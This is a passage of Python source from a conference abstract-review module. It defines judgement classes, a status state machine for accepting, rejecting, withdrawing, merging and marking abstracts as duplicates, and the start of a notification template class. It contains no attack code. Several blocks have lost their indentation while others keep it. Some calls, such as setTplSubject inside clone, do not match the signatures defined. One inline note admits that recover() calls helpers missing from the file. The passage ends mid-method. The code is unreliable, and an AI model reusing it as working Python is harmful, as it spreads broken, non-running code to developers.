# check if there is a previous judgement of this author in for this abstract in this track
self._removePreviousJud(responsible, track)
if track is not None:
jud = AbstractMarkedAsDuplicated( track, responsible, originalAbstract, answers )
jud.setComment( comments )
self._addTrackJudgementToHistorical(jud)
else:
for t in self.getTrackList():
jud = AbstractMarkedAsDuplicated( t, responsible, originalAbstract, answers )
jud.setComment( comments )
self._addTrackJudgementToHistorical(jud)
# Update the rating of the abstract
self.updateRating()
def unMarkAsDuplicated(self,responsible,comments="", track=None, answers=[]):
"""
"""
#we must clear any track judgement
self._clearTrackAcceptances()
self._clearTrackRejections()
self._clearTrackReallocations()
#self.getCurrentStatus().recover() #status change
self.getCurrentStatus().unMarkAsDuplicated(responsible,comments)
# check if there is a previous judgement of this author in for this abstract in this track
self._removePreviousJud(responsible, track)
if track is not None:
jud = AbstractUnMarkedAsDuplicated(track, responsible, answers )
jud.setComment( comments )
self._addTrackJudgementToHistorical(jud)
else:
for t in self.getTrackList():
jud = AbstractUnMarkedAsDuplicated( t, responsible, answers )
jud.setComment( comments )
self._addTrackJudgementToHistorical(jud)
# Update the rating of the abstract
self.updateRating()
self._notifyModification()
    def mergeInto(self,responsible,targetAbs,mergeAuthors=False,comments=""):
        """Merge this abstract into *targetAbs* (state transition on self).

        When *mergeAuthors* is true, this abstract's primary and co-authors
        are copied into the target abstract.
        """
        self.getCurrentStatus().mergeInto(responsible,targetAbs,comments)
        targetAbs.addMergeFromAbstract(self)
        if mergeAuthors:
            #for auth in self.getAuthorList():
            #    newAuth=targetAbs.newAuthor()
            #    newAuth.setFromAbstractParticipation(auth)
            #    if self.isPrimaryAuthor(auth):
            #        targetAbs.addPrimaryAuthor(newAuth)
            for auth in self.getPrimaryAuthorList():
                newAuth=targetAbs.newPrimaryAuthor()
                newAuth.setFromAbstractParticipation(auth)
            for auth in self.getCoAuthorList():
                newAuth=targetAbs.newCoAuthor()
                newAuth.setFromAbstractParticipation(auth)
    def notify(self,notificator,responsible):
        """notifies the abstract responsibles with a matching template
        """
        tpl=self.getOwner().getNotifTplForAbstract(self)
        if not tpl:
            # no matching notification template: nothing to send
            return
        notificator.notify(self,tpl)
        self.getNotificationLog().addEntry(NotifLogEntry(responsible,tpl))
    def unMerge(self,responsible,comments=""):
        """Undo a merge: clears every track judgement, detaches self from
        the target abstract's merge list and reverts the status."""
        #we must clear any track judgement
        self._clearTrackAcceptances()
        self._clearTrackRejections()
        self._clearTrackReallocations()
        self.getCurrentStatus().getTargetAbstract().removeMergeFromAbstract(self)
        self.getCurrentStatus().unMerge(responsible,comments)
        self._notifyModification()
    def getNotificationLog(self):
        # created lazily for legacy persisted objects
        try:
            if self._notifLog:
                pass
        except AttributeError:
            self._notifLog=NotificationLog(self)
        return self._notifLog
    # Rating methods
    def getRating(self):
        """ Get the average rating of the abstract (None when never rated) """
        try:
            if self._rating:
                pass
        except AttributeError:
            self._rating = None
        return self._rating
    def updateRating(self, scale = None):
        """
        Update the average rating of the abstract which is calculated with the average of each judgement.
        If the scale (tuple with lower,higher) is passed, the judgement are re-adjusted to the new scale.
        The rating stays None when no judgement carries a numeric value.
        """
        self._rating = None
        # calculate the total valoration
        judNum = 0
        ratingSum = 0
        for track in self.getTrackListSorted():
            for jud in self.getJudgementHistoryByTrack(track):
                if scale:
                    # calculate the new values for each judgement
                    scaleLower, scaleHigher = scale
                    jud.recalculateJudgementValues(scaleLower, scaleHigher)
                if jud.getJudValue() != None: # it means there is a numeric value for the judgement
                    ratingSum += jud.getJudValue()
                    judNum += 1
        # Calculate the average
        if judNum != 0:
            self._rating = float(ratingSum) / judNum
def getQuestionsAverage(self):
'''Get the list of questions answered in the reviews for an abstract '''
dTotals = {} # {idQ1: total_value, idQ2: total_value ...}
dTimes = {} # {idQ1: times_answered, idQ2: times_answered}
for track in self.getTrackListSorted():
for jud in self.getJudgementHistoryByTrack(track):
for answer in jud.getAnswers():
# check if the question is in d and sum the answers value or insert in d the new question
if dTotals.has_key(answer.getQuestion().getText()):
dTotals[answer.getQuestion().getText()] += answer.getValue()
dTimes[answer.getQuestion().getText()] += 1
else: # first time
dTotals[answer.getQuestion().getText()] = answer.getValue()
dTimes[answer.getQuestion().getText()] = 1
# get the questions average
questionsAverage = {}
for q, v in dTotals.iteritems():
# insert the element and calculate the average for the value
questionsAverage[q] = float(v)/dTimes[q]
return questionsAverage
    def removeAnswersOfQuestion(self, questionId):
        ''' Remove the answers of the question with questionId value '''
        for track in self.getTrackListSorted():
            for jud in self.getJudgementHistoryByTrack(track):
                jud.removeAnswer(questionId)
    def getRatingPerReviewer(self, user, track):
        """
        Get the rating of the user for the abstract in the track given.
        Returns None (implicitly) when the user never judged that track.
        """
        for jud in self.getJudgementHistoryByTrack(track):
            if (jud.getResponsible() == user):
                return jud.getJudValue()
    def getLastJudgementPerReviewer(self, user, track):
        """
        Get the last judgement of the user for the abstract in the track given.
        (History lists are newest-first, so the first match is the latest.)
        """
        for jud in self.getJudgementHistoryByTrack(track):
            if (jud.getResponsible() == user):
                return jud
    def _getAttachmentsCounter(self):
        # lazily-created counter; returns the next attachment id
        try:
            if self._attachmentsCounter:
                pass
        except AttributeError:
            self._attachmentsCounter = Counter()
        return self._attachmentsCounter.newCount()
    def setAttachments(self, attachments):
        self._attachments = attachments
    def getAttachments(self):
        # mapping file id -> attached file (see saveFiles); created lazily
        try:
            if self._attachments:
                pass
        except AttributeError:
            self._attachments = {}
        return self._attachments
    def getAttachmentById(self, id):
        return self.getAttachments().get(id, None)
class AbstractJudgement( Persistent ):
    """Single judgement emitted by a track about an abstract.

    Each track for which an abstract is proposed can make a judgement
    proposing the abstract to be accepted or rejected. Different track
    judgements are kept so the referees who take the final decision can
    overview the different opinions of the track coordinators.
    Together with the judgement, the date when it was done and the
    responsible user are stored.
    """

    def __init__( self, track, responsible, answers ):
        self._track = track
        self._setResponsible( responsible )
        self._date = nowutc()
        self._comment = ""
        self._answers = answers
        self._judValue = self.calculateJudgementAverage() # judgement average value
        self._totalJudValue = self.calculateAnswersTotalValue()

    def _setResponsible( self, newRes ):
        self._responsible = newRes

    def getResponsible( self ):
        return self._responsible

    def getDate( self ):
        return self._date

    def setDate(self, date):
        self._date = date

    def getTrack( self ):
        return self._track

    def setComment( self, newComment ):
        # stored stripped of surrounding whitespace
        self._comment = newComment.strip()

    def getComment( self ):
        return self._comment

    def getAnswers(self):
        # lazy init for objects persisted before answers existed
        try:
            if self._answers:
                pass
        except AttributeError:
            self._answers = []
        return self._answers

    def calculateJudgementAverage(self):
        '''Return the average of the answer values, or None when the
        review carried no rating questions.'''
        answers = self.getAnswers()
        if not answers:
            return None
        values = [ans.getValue() for ans in answers]
        # float() keeps the division exact under Python 2 integer division
        return sum(values) / float(len(values))

    def getJudValue(self):
        # cached average; recomputed lazily for legacy persisted objects
        try:
            if self._judValue:
                pass
        except AttributeError:
            self._judValue = self.calculateJudgementAverage() # judgement average value
        return self._judValue

    def getTotalJudValue(self):
        # cached sum of ratings; recomputed lazily for legacy objects
        try:
            if self._totalJudValue:
                pass
        except AttributeError:
            self._totalJudValue = self.calculateAnswersTotalValue()
        return self._totalJudValue

    def calculateAnswersTotalValue(self):
        ''' Calculate the sum of all the ratings '''
        result = 0
        for ans in self.getAnswers():
            result += ans.getValue()
        return result

    def recalculateJudgementValues(self, scaleLower, scaleHigher):
        ''' Update the values of the judgement. This function is called when the scale is changed.'''
        for ans in self.getAnswers():
            ans.calculateRatingValue(scaleLower, scaleHigher)
        self._judValue = self.calculateJudgementAverage()
        self._totalJudValue = self.calculateAnswersTotalValue()

    def removeAnswer(self, questionId):
        ''' Remove every answer belonging to question *questionId*.

        Iterates over a copy of the list: the previous implementation
        removed elements from the very list it was iterating, which
        silently skipped the element following each removal.
        '''
        removed = False
        for ans in list(self.getAnswers()):
            if ans.getQuestion().getId() == questionId:
                self._answers.remove(ans)
                removed = True
        if removed:
            self._notifyModification()

    def _notifyModification(self):
        # persistence hook: flag the object as dirty for ZODB
        self._p_changed = 1
class AbstractAcceptance( AbstractJudgement ):
    """Track judgement proposing the abstract for acceptance, optionally
    with a contribution type.
    """

    def __init__( self, track, responsible, contribType, answers ):
        AbstractJudgement.__init__( self, track, responsible, answers )
        self._contribType = contribType

    def clone(self,track):
        # Return a copy of this acceptance attached to the given track.
        aa = AbstractAcceptance(track,self.getResponsible(), self.getContribType(), self.getAnswers())
        return aa

    def getContribType( self ):
        # Lazily default for objects persisted before the attribute existed.
        try:
            if self._contribType:
                pass
        except AttributeError, e:
            self._contribType = None
        return self._contribType
class AbstractRejection( AbstractJudgement ):
    """Track judgement proposing the abstract for rejection."""

    def clone(self, track):
        """Return a copy of this rejection attached to the given track."""
        return AbstractRejection(track, self.getResponsible(), self.getAnswers())
class AbstractReallocation( AbstractJudgement ):
    """Track judgement proposing to move the abstract to other tracks."""

    def __init__( self, track, responsible, propTracks, answers ):
        AbstractJudgement.__init__( self, track, responsible, answers )
        self._proposedTracks = PersistentList( propTracks )

    def clone(self, track):
        # Return a copy of this reallocation attached to the given track.
        arl = AbstractReallocation(track, self.getResponsible(), self.getProposedTrackList(), self.getAnswers())
        return arl

    def getProposedTrackList( self ):
        return self._proposedTracks
class AbstractInConflict( AbstractJudgement ):
    """Marker judgement signalling contradictory proposals within a track."""

    def __init__( self, track ):
        # No responsible user and no answers: this is a synthetic marker.
        AbstractJudgement.__init__( self, track, None, '' )

    def clone(self, track):
        aic = AbstractInConflict(track, None, '')
        return aic
class AbstractMarkedAsDuplicated( AbstractJudgement ):
    """Judgement recording that the abstract was marked as a duplicate of
    another (original) abstract.
    """

    def __init__( self, track, responsible, originalAbst, answers ):
        AbstractJudgement.__init__( self, track, responsible, answers )
        self._originalAbst=originalAbst

    def clone(self,track):
        amad = AbstractMarkedAsDuplicated(track,self.getResponsible(), self.getOriginalAbstract(), self.getAnswers())
        return amad

    def getOriginalAbstract(self):
        return self._originalAbst
class AbstractUnMarkedAsDuplicated( AbstractJudgement ):
    """Judgement recording that the abstract was un-marked as a duplicate."""

    def clone(self,track):
        # Bug fix: AbstractJudgement.__init__ requires an "answers" argument;
        # the previous code omitted it, so every clone raised TypeError.
        auad = AbstractUnMarkedAsDuplicated(track, self.getResponsible(), self.getAnswers())
        return auad
class AbstractStatus( Persistent ):
    """This class represents any of the status in which an abstract can be.
        From the moment they are submitted (and therefore created), abstracts
        can go through different status each having a different meaning.
        As there can be many status, the transitions between them are quite
        complex and as the system evolves we could require to add or delete
        new status the "Status" pattern is applied. This is the base class.
        Apart from giving information about the status of an abstract, this
        class is responsible to store information about how the status was
        reached (who provoked the transition, when, ...).
    """
    _name = ""

    def __init__( self, abstract ):
        self._setAbstract( abstract )
        self._setDate( nowutc() )

    def getName(self):
        return self._name

    def _setAbstract( self, abs ):
        self._abstract = abs

    def getAbstract( self ):
        return self._abstract

    def _setDate( self, date ):
        self._date = date

    def getDate( self ):
        # Date at which this status was entered.
        return self._date

    def accept(self,responsible,destTrack,type,comments=""):
        """Transition the abstract to the ACCEPTED status."""
        s = AbstractStatusAccepted(self.getAbstract(),responsible,destTrack,type,comments)
        self.getAbstract().setCurrentStatus( s )

    def reject( self, responsible, comments = "" ):
        """Transition the abstract to the REJECTED status."""
        s = AbstractStatusRejected( self.getAbstract(), responsible, comments )
        self.getAbstract().setCurrentStatus( s )

    def _getStatusClass( self ):
        """Derive the status class this abstract should currently be in from
        the track judgements made so far.
        """
        numAccepts = self._abstract.getNumProposedToAccept() # number of tracks that have at least one proposal to accept
        numReallocate = self._abstract.getNumProposedToReallocate() # number of tracks that have at least one proposal to reallocate
        numJudgements = self._abstract.getNumJudgements() # number of tracks that have at least one judgement
        if numJudgements > 0:
            # If at least one track status is in conflict the abstract status is in conflict too.
            if any(isinstance(self._abstract.getTrackJudgement(track), AbstractInConflict) for track in self._abstract.getTrackList()):
                return AbstractStatusInConflict
            numTracks = self._abstract.getNumTracks() # number of tracks that this abstract has assigned
            if numTracks == numJudgements: # Do we have judgements for all tracks?
                if numReallocate == numTracks:
                    # every track wants it elsewhere -> no agreement
                    return AbstractStatusInConflict
                elif numAccepts == 1:
                    return AbstractStatusProposedToAccept
                elif numAccepts == 0:
                    return AbstractStatusProposedToReject
                # more than one acceptance proposal -> conflict
                return AbstractStatusInConflict
            return AbstractStatusUnderReview
        return AbstractStatusSubmitted

    def update( self ):
        """Recompute the status from the judgements and switch to it when it
        differs from the current one.
        """
        newStatusClass = self._getStatusClass()
        if self.__class__ != newStatusClass:
            self.getAbstract().setCurrentStatus( newStatusClass( self._abstract ) )

    def proposeToAccept( self ):
        """Re-derive the status after a track proposed acceptance."""
        s = self._getStatusClass()( self._abstract )
        self.getAbstract().setCurrentStatus( s )

    def proposeToReject( self ):
        """Re-derive the status after a track proposed rejection."""
        s = self._getStatusClass()( self._abstract )
        self.getAbstract().setCurrentStatus( s )

    def proposeToReallocate( self ):
        """Re-derive the status after a track proposed reallocation."""
        s = self._getStatusClass()( self._abstract )
        self.getAbstract().setCurrentStatus( s )

    def withdraw(self,resp,comments=""):
        """Transition the abstract to the WITHDRAWN status, remembering the
        current status so it can be recovered later.
        """
        s=AbstractStatusWithdrawn(self.getAbstract(), resp, self, comments)
        self.getAbstract().setCurrentStatus(s)

    def recover( self ):
        # Only meaningful for AbstractStatusWithdrawn, which overrides it.
        raise MaKaCError( _("only withdrawn abstracts can be recovered"))

    def markAsDuplicated(self,responsible,originalAbs,comments=""):
        """Transition the abstract to the DUPLICATED status, pointing at the
        original abstract. Chained duplicates are forbidden.
        """
        if self.getAbstract()==originalAbs:
            raise MaKaCError( _("the original abstract is the same as the duplicated one"))
        if isinstance(originalAbs.getCurrentStatus(),AbstractStatusDuplicated):
            raise MaKaCError( _("cannot set as original abstract one which is already marked as duplicated"))
        s=AbstractStatusDuplicated(self.getAbstract(),responsible,originalAbs,comments)
        self.getAbstract().setCurrentStatus(s)

    def unMarkAsDuplicated(self,responsible,comments=""):
        # Overridden by AbstractStatusDuplicated; invalid anywhere else.
        raise MaKaCError( _("Only duplicated abstract can be unmark as duplicated"))

    def mergeInto(self,responsible,targetAbs,comments=""):
        """Transition the abstract to the MERGED status, pointing at the
        target abstract. The target must be in a status able to receive
        mergings.
        """
        if self.getAbstract()==targetAbs:
            raise MaKaCError( _("An abstract cannot be merged into itself"))
        if targetAbs.getCurrentStatus().__class__ not in [AbstractStatusSubmitted,AbstractStatusUnderReview,AbstractStatusProposedToAccept,AbstractStatusProposedToReject,AbstractStatusInConflict]:
            raise MaKaCError(_("Target abstract is in a status which cannot receive mergings"))
        s=AbstractStatusMerged(self.getAbstract(),responsible,targetAbs,comments)
        self.getAbstract().setCurrentStatus(s)

    def unMerge(self,responsible,comments=""):
        # Overridden by AbstractStatusMerged; invalid anywhere else.
        raise MaKaCError( _("Only merged abstracts can be unmerged"))

    def getComments(self):
        # Subclasses carrying comments override this.
        return ""
class AbstractStatusSubmitted( AbstractStatus ):
    """Initial status of an abstract: submitted, with no judgement yet."""

    def clone(self,abstract):
        ass = AbstractStatusSubmitted(abstract)
        return ass

    def update( self ):
        # An abstract that has been submitted and has no judgement must
        # remain in the submitted status.
        if self._abstract.getNumJudgements() == 0:
            return
        AbstractStatus.update( self )
class AbstractStatusAccepted( AbstractStatus ):
    """Final status: the abstract was accepted into a track with a
    contribution type, possibly linked to the contribution created from it.
    """

    def __init__(self,abstract,responsible,destTrack,type,comments=""):
        AbstractStatus.__init__( self, abstract )
        self._setResponsible( responsible )
        self._setTrack( destTrack )
        self._setComments( comments )
        self._setType( type )
        self._contrib = None

    def clone(self,abstract):
        # NOTE(review): the linked contribution is deliberately not cloned.
        asa = AbstractStatusAccepted(abstract,self.getResponsible(), self.getTrack(), self.getType(), self.getComments())
        return asa

    def _setResponsible( self, res ):
        self._responsible = res

    def getResponsible( self ):
        return self._responsible

    def _setComments( self, comments ):
        self._comments = str( comments ).strip()

    def getComments( self ):
        # Lazily default for objects persisted before the attribute existed.
        try:
            if self._comments:
                pass
        except AttributeError:
            self._comments = ""
        return self._comments

    def _setTrack( self, track ):
        self._track = track

    def getTrack( self ):
        # Track into which the abstract was accepted (may be None).
        try:
            if self._track:
                pass
        except AttributeError:
            self._track = None
        return self._track

    def _setType( self, type ):
        self._contribType = type

    def getType( self ):
        # Contribution type assigned on acceptance (may be None).
        try:
            if self._contribType:
                pass
        except AttributeError:
            self._contribType = None
        return self._contribType

    def setContribution( self, newContrib ):
        self._contrib = newContrib

    def getContribution( self ):
        try:
            if self._contrib:
                pass
        except AttributeError:
            self._contrib = None
        return self._contrib

    def update( self ):
        # Accepted is a final state: never recomputed from track judgements.
        return

    def accept(self,responsible,destTrack,type,comments="" ):
        raise MaKaCError( _("Cannot accept an abstract which is already accepted"))

    def reject( self, responsible, comments="" ):
        raise MaKaCError( _("Cannot reject an abstract which is already accepted"))

    def proposeToAccept( self ):
        raise MaKaCError( _("Cannot propose for acceptance an abstract which is already accepted"))

    def proposeToReject( self ):
        raise MaKaCError( _("Cannot propose for rejection an abstract which is already accepted"))

    def proposeToReallocate( self ):
        raise MaKaCError( _("Cannot propose for reallocation an abstract which is already accepted"))

    def markAsDuplicated(self,responsible,originalAbs,comments=""):
        raise MaKaCError( _("Cannot mark as duplicated an abstract which is accepted"))

    def unMarkAsDuplicated(self,responsible,comments=""):
        raise MaKaCError( _("Only duplicated abstract can be unmark as duplicated"))

    def mergeInto(self,responsible,targetAbs,comments=""):
        raise MaKaCError( _("Cannot merge an abstract which is already accepted"))

    def withdraw(self,resp,comments=""):
        """Withdraw the abstract and, when a contribution was created from
        it, withdraw that contribution as well.
        """
        contrib=self.getContribution()
        #this import is made here and not at the top of the file in order to
        # avoid recursive import troubles
        from MaKaC.conference import ContribStatusWithdrawn
        if contrib is not None and \
                not isinstance(contrib.getCurrentStatus(),ContribStatusWithdrawn):
            contrib.withdraw(resp, i18nformat(""" _("abstract withdrawn"): %s""")%comments)
        AbstractStatus.withdraw(self,resp,comments)
class AbstractStatusRejected( AbstractStatus ):
    """Final status: the abstract was rejected."""

    def __init__( self, abstract, responsible, comments = "" ):
        AbstractStatus.__init__( self, abstract )
        self._setResponsible( responsible )
        self._setComments( comments )

    def clone(self,abstract):
        asr = AbstractStatusRejected(abstract, self.getResponsible(), self.getComments())
        return asr

    def _setResponsible( self, res ):
        self._responsible = res

    def getResponsible( self ):
        return self._responsible

    def _setComments( self, comments ):
        self._comments = str( comments ).strip()

    def getComments( self ):
        # Lazily default for objects persisted before the attribute existed.
        try:
            if self._comments:
                pass
        except AttributeError:
            self._comments = ""
        return self._comments

    def update( self ):
        # Rejected is a final state: never recomputed from track judgements.
        return

    def reject( self, responsible, comments="" ):
        raise MaKaCError( _("Cannot reject an abstract which is already rejected"))

    def proposeToAccept( self ):
        raise MaKaCError( _("Cannot propose for acceptance an abstract which is already rejected"))

    def proposeToReject( self ):
        raise MaKaCError( _("Cannot propose for rejection an abstract which is already rejected"))

    def proposeToReallocate( self ):
        raise MaKaCError( _("Cannot propose for reallocation an abstract which is already rejected"))

    def withdraw(self,resp,comments=""):
        raise MaKaCError( _("Cannot withdraw a REJECTED abstract"))

    def markAsDuplicated(self,responsible,originalAbs,comments=""):
        raise MaKaCError( _("Cannot mark as duplicated an abstract which is rejected"))

    def unMarkAsDuplicated(self,responsible,comments=""):
        raise MaKaCError( _("Only duplicated abstract can be unmark as duplicated"))

    def mergeInto(self,responsible,targetAbs,comments=""):
        raise MaKaCError( _("Cannot merge an abstract which is rejected"))
class AbstractStatusUnderReview( AbstractStatus ):
    """Status of an abstract whose tracks have started judging it but for
    which no overall proposal can be derived yet.
    """

    def clone(self, abstract):
        """Return a fresh under-review status bound to the given abstract."""
        return AbstractStatusUnderReview(abstract)
class AbstractStatusProposedToAccept( AbstractStatus ):
    """Status derived when exactly one track proposed acceptance."""

    def clone(self, abstract):
        aspta = AbstractStatusProposedToAccept(abstract)
        return aspta

    def getTrack(self):
        # Track of the (single) acceptance proposal.
        # NOTE(review): assumes getTrackAcceptanceList() is non-empty --
        # guaranteed only while the status is correctly derived.
        jud=self.getAbstract().getTrackAcceptanceList()[0]
        return jud.getTrack()

    def getType(self):
        # Contribution type of the (single) acceptance proposal.
        jud=self.getAbstract().getTrackAcceptanceList()[0]
        return jud.getContribType()
class AbstractStatusProposedToReject( AbstractStatus ):
    """Status derived when every judging track proposed rejection."""

    def clone(self, abstract):
        """Return a fresh proposed-to-reject status bound to the abstract."""
        return AbstractStatusProposedToReject(abstract)
class AbstractStatusInConflict( AbstractStatus ):
    """Status derived when the track judgements contradict each other."""

    def clone(self, abstract):
        """Return a fresh in-conflict status bound to the given abstract."""
        return AbstractStatusInConflict(abstract)
class AbstractStatusWithdrawn(AbstractStatus):
    """Status of an abstract withdrawn by (or on behalf of) its submitter.

    Keeps a reference to the previous status so the abstract can later be
    recovered.
    """

    def __init__(self,abstract,responsible, prevStatus,comments=""):
        AbstractStatus.__init__(self,abstract)
        self._setComments(comments)
        self._setResponsible(responsible)
        self._prevStatus=prevStatus

    def clone(self,abstract):
        # Bug fix: the previous code called the constructor with only
        # (abstract, responsible, comments), so the comments landed in the
        # prevStatus slot and both values were effectively lost.
        # NOTE(review): the cloned status still references the previous
        # status object of the source abstract -- confirm whether it should
        # be cloned for the new abstract as well.
        asw = AbstractStatusWithdrawn(abstract, self.getResponsible(),
                                      self.getPrevStatus(), self.getComments())
        return asw

    def _setResponsible(self,newResp):
        self._responsible=newResp

    def getResponsible(self):
        # Legacy objects may lack the attribute; default to the submitter.
        try:
            if self._responsible:
                pass
        except AttributeError:
            self._responsible=self._abstract.getSubmitter().getAvatar()
        return self._responsible

    def getPrevStatus(self):
        # Status the abstract was in before withdrawal (None for legacy
        # objects persisted before this attribute existed).
        try:
            if self._prevStatus:
                pass
        except AttributeError:
            self._prevStatus=None
        return self._prevStatus

    def _setComments( self, comments ):
        self._comments = str( comments ).strip()

    def getComments( self ):
        return self._comments

    def update( self ):
        # Withdrawn is a final state: never recomputed from track judgements.
        return

    def accept(self,responsible,destTrack,type,comments=""):
        raise MaKaCError( _("Cannot accept an abstract wich is withdrawn"))

    def reject( self, responsible, comments="" ):
        raise MaKaCError( _("Cannot reject an abstract which is withdrawn"))

    def proposeToAccept( self ):
        raise MaKaCError( _("Cannot propose for acceptance an abstract which withdrawn"))

    def proposeToReject( self ):
        raise MaKaCError( _("Cannot propose for rejection an abstract which is withdrawn"))

    def recover( self ):
        """Restore the abstract to its pre-withdrawal status (or re-derive
        one when no previous status was recorded).
        """
        if self.getPrevStatus() is None:
            # Reset all the judgements and rebuild the status from scratch.
            # NOTE(review): these _clearTrack* helpers are not defined on
            # this class hierarchy in this file -- confirm they exist on a
            # mixin/base, otherwise this path raises AttributeError.
            self._clearTrackAcceptances()
            self._clearTrackRejections()
            self._clearTrackReallocations()
            contrib=self.getAbstract().getContribution()
            if contrib is None:
                s = AbstractStatusSubmitted( self.getAbstract() )
            else:
                s = AbstractStatusAccepted(self.getAbstract(),self.getResponsible(),contrib.getTrack(),contrib.getType(),"")
        else:
            contrib=self.getAbstract().getContribution()
            if contrib is not None and not isinstance(self.getPrevStatus(), AbstractStatusAccepted):
                # A contribution exists, so the abstract must come back as
                # accepted even if it was withdrawn from another status.
                s = AbstractStatusAccepted(self.getAbstract(),self.getResponsible(),contrib.getTrack(),contrib.getType(),"")
            else:
                s=self.getPrevStatus()
        self.getAbstract().setCurrentStatus( s )

    def markAsDuplicated(self,responsible,originalAbs,comments=""):
        raise MaKaCError( _("Cannot mark as duplicated an abstract which is withdrawn"))

    def unMarkAsDuplicated(self,responsible,comments=""):
        raise MaKaCError( _("Only duplicated abstract can be unmark as duplicated"))

    def mergeInto(self,responsible,targetAbs,comments=""):
        raise MaKaCError( _("Cannot merge an abstract which is withdrawn"))

    def withdraw(self,resp,comments=""):
        raise MaKaCError( _("This abstract is already withdrawn"))
class AbstractStatusDuplicated(AbstractStatus):
    """Status of an abstract marked as a duplicate of another (original)
    abstract.
    """

    def __init__( self,abstract,responsible,originalAbstract,comments=""):
        AbstractStatus.__init__(self,abstract)
        self._setResponsible(responsible)
        self._setComments(comments)
        self._setOriginalAbstract(originalAbstract)

    def clone(self, abstract):
        asd = AbstractStatusDuplicated(abstract,self.getResponsible(),self.getOriginal(),self.getComments())
        return asd

    def _setResponsible( self, res ):
        self._responsible = res

    def getResponsible(self):
        return self._responsible

    def _setComments( self, comments ):
        self._comments = str( comments ).strip()

    def getComments( self ):
        return self._comments

    def _setOriginalAbstract(self,abs):
        self._original=abs

    def getOriginal(self):
        # The abstract this one duplicates.
        return self._original

    def update( self ):
        # Duplicated is a final state: never recomputed from judgements.
        return

    def reject( self, responsible, comments="" ):
        raise MaKaCError( _("Cannot reject an abstract which is duplicated"))

    def proposeToAccept( self ):
        raise MaKaCError( _("Cannot propose for acceptance an abstract which is duplicated"))

    def proposeToReject( self ):
        raise MaKaCError( _("Cannot propose for rejection an abstract which is duplicated"))

    def proposeToReallocate( self ):
        raise MaKaCError( _("Cannot propose for reallocation an abstract which is duplicated"))

    def withdraw(self,resp,comments=""):
        raise MaKaCError( _("Cannot withdraw a duplicated abstract"))

    def markAsDuplicated(self,responsible,originalAbs,comments=""):
        raise MaKaCError( _("This abstract is already duplicated"))

    def unMarkAsDuplicated(self,responsible,comments=""):
        # Un-marking returns the abstract to the initial SUBMITTED status.
        s = AbstractStatusSubmitted( self.getAbstract() )
        self.getAbstract().setCurrentStatus( s )

    def mergeInto(self,responsible,targetAbs,comments=""):
        raise MaKaCError( _("Cannot merge an abstract which is marked as a duplicate"))
class AbstractStatusMerged(AbstractStatus):
    """Status of an abstract merged into another (target) abstract."""

    def __init__(self,abstract,responsible,targetAbstract,comments=""):
        AbstractStatus.__init__(self,abstract)
        self._setResponsible(responsible)
        self._setComments(comments)
        self._setTargetAbstract(targetAbstract)

    def clone(self,abstract):
        asm = AbstractStatusMerged(abstract,self.getResponsible(),self.getTargetAbstract(),self.getComments())
        return asm

    def _setResponsible( self, res ):
        self._responsible = res

    def getResponsible( self ):
        return self._responsible

    def _setComments( self, comments ):
        self._comments = str( comments ).strip()

    def getComments( self ):
        return self._comments

    def _setTargetAbstract(self,abstract):
        self._target=abstract

    def getTargetAbstract(self):
        # The abstract this one was merged into.
        return self._target

    def update( self ):
        # Merged is a final state: never recomputed from track judgements.
        return

    def reject( self, responsible, comments="" ):
        raise MaKaCError( _("Cannot reject an abstract which is merged into another one"))

    def proposeToAccept( self ):
        raise MaKaCError( _("Cannot propose for acceptance an abstract which is merged into another one"))

    def proposeToReject( self ):
        raise MaKaCError( _("Cannot propose for rejection an abstract which is merged into another one"))

    def proposeToReallocate( self ):
        raise MaKaCError( _("Cannot propose for reallocation an abstract which is merged into another one"))

    def withdraw(self,resp,comments=""):
        raise MaKaCError( _("Cannot withdraw an abstract which is merged into another one"))

    def markAsDuplicated(self,responsible,originalAbs,comments=""):
        raise MaKaCError( _("Cannot mark as duplicated an abstract which is merged into another one"))

    def unMarkAsDuplicated(self,responsible,comments=""):
        raise MaKaCError( _("Only duplicated abstract can be unmark as duplicated"))

    def mergeInto(self,responsible,target,comments=""):
        raise MaKaCError( _("This abstract is already merged into another one"))

    def unMerge(self,responsible,comments=""):
        # Un-merging returns the abstract to the initial SUBMITTED status.
        s = AbstractStatusSubmitted( self.getAbstract() )
        self.getAbstract().setCurrentStatus( s )
class AbstractStatusNone(AbstractStatus):
    """Special status assigned to abstracts sitting in the trash can."""

    def __init__(self, abstract):
        AbstractStatus.__init__(self, abstract)

    def clone(self, abstract):
        """Return a fresh 'none' status bound to the given abstract."""
        return AbstractStatusNone(abstract)
class NotificationTemplate(Persistent):
def __init__(self):
self._owner=None
self._id=""
self._name=""
self._description=""
self._tplSubject=""
self._tplBody=""
self._fromAddr = ""
self._CAasCCAddr = False
self._ccAddrList=PersistentList()
self._toAddrs = PersistentList()
self._conditions=PersistentList()
self._toAddrGenerator=Counter()
self._condGenerator=Counter()
def clone(self):
tpl = NotificationTemplate()
tpl.setName(self.getName())
tpl.setDescription(self.getDescription())
tpl.setTplSubject(self.getTplSubject())
tpl.setTplBody(self.getTplBody())
tpl.setFromAddr(self.getFromAddr())
tpl.setCAasCCAddr(self.getCAasCCAddr())
for cc in self.getCCAddrList() :
tpl.addCCAddr(cc)
for to in self.getToAddrList() :
tpl.addToAddr(to)
for con in self.getConditionList() :
tpl.addCondition(con.clone(tpl))
return tpl
def delete(self):
self.clearToAddrs()
self.clearCCAddrList()
self.clearConditionList()
TrashCanManager().add(self)
def recover(self):
TrashCanManager().remove(self)
## def getResponsible( self ):
## return self._responsible
##
## def _setComments( self, comments ):
## self._comments = str( comments ).strip()
##
## def getComments( self ):
## return self._comments
##
## def _setOriginalAbstract(self,abstract):
## self._original=abstract
def canModify(self, aw_or_user):
return self.getConference().canModify(aw_or_user)
def getLocator(self):
loc = self.getOwner().getConference().getLocator()
loc["notifTplId"] = self._id
return loc
def getConference(self):
return self._owner.getConference()
def includeInOwner(self,owner,id):
self._owner=owner
self._id=id
def getOwner(self):
return self._owner
def getId(self):
return self._id
def setName(self,newName):
self._name=newName.strip()
def getName(self):
return self._name
def setDescription(self,newDesc):
self._description=newDesc.strip()
def getDescription(self):
return self._description
def setTplSubject(self,newSubject, varList):
self._tplSubject=self.parseTplContent(newSubject, varList).strip()
def getTplSubject(self):
return self._tplSubject
def getTplSubjectShow(self, varList):
return self.parseTplContentUndo(self._tplSubject, varList)
def setTplBody(self,newBody, varList):
self._tplBody=self.parseTplContent(newBody, varList).strip()
def getTplBody(self):
return self._tplBody
def getTplBodyShow(self, varList):
return self.parseTplContentUndo(self._tplBody, varList)
def getCCAddrList(self):
try:
if self._ccAddrList:
pass
except AttributeError:
self._ccAddrList=PersistentList()
